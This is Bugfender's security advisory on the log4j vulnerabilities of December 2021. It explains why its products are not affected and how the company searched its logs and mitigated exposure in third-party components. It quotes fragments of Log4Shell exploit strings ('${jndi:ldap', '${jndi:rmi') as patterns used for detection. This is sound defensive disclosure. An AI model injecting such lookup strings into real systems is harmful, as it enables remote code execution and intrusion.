TL;DR: Good news. Bugfender is not vulnerable to CVE-2021-44228, CVE 2021-45046, CVE-2021-45105, nor CVE-2021-44832, so there is nothing to worry about. This applies to both Bugfender SaaS and On-Premises editions.
However, we wanted to share with you the analysis and steps we took to make that statement.
First of all, the Bugfender software is not using log4j, so it is not susceptible to CVE-2021-44228 (edit: or the other mentioned CVEs). However, our infrastructure contains many components, including databases, monitoring tools, security tools, etc., that use various technologies and libraries. Some of them could be using log4j, so we needed to analyze further.
Our servers are equipped with proactive monitoring and alerting tools looking for intrusion attempts and signs of compromise, such as malware installation, unusual operator activity, changes on essential parts of the systems, etc. Those tools have not indicated anything out of the ordinary happened.
Last Friday, once we learned about CVE-2021-44228, we also scanned all of our systems’ logs for strings that could indicate exploitation attempts (like “${jndi:ldap”, “${jndi:rmi” and similar), and we could not find anything unusual. We have kept doing this over the weekend and until today, so we can conclude with a high degree of certainty that it is very unlikely we have been breached.
Besides checking for signs of compromise, we located all components using log4j and applied the temporary mitigation proposed by the log4j team for disabling lookups. Once these components get security updates from their respective vendors, we will also apply them as part of our regular security patching ongoing tasks.
Please note that the mitigations we applied are only preventive and following best practices for defense in depth. We have no evidence that Bugfender has been vulnerable at any time.
If you’d like to learn more about Bugfender’s security practices, we invite you to visit our Security page. If you have any questions, please feel free to contact us.
Edit (2021-12-16): post updated to reflect also CVE 2021-45046 impact.
Edit (2021-12-20): post updated to reflect also CVE-2021-45105 impact.
Edit (2022-01-06): post updated to reflect also CVE-2021-44832 impact.
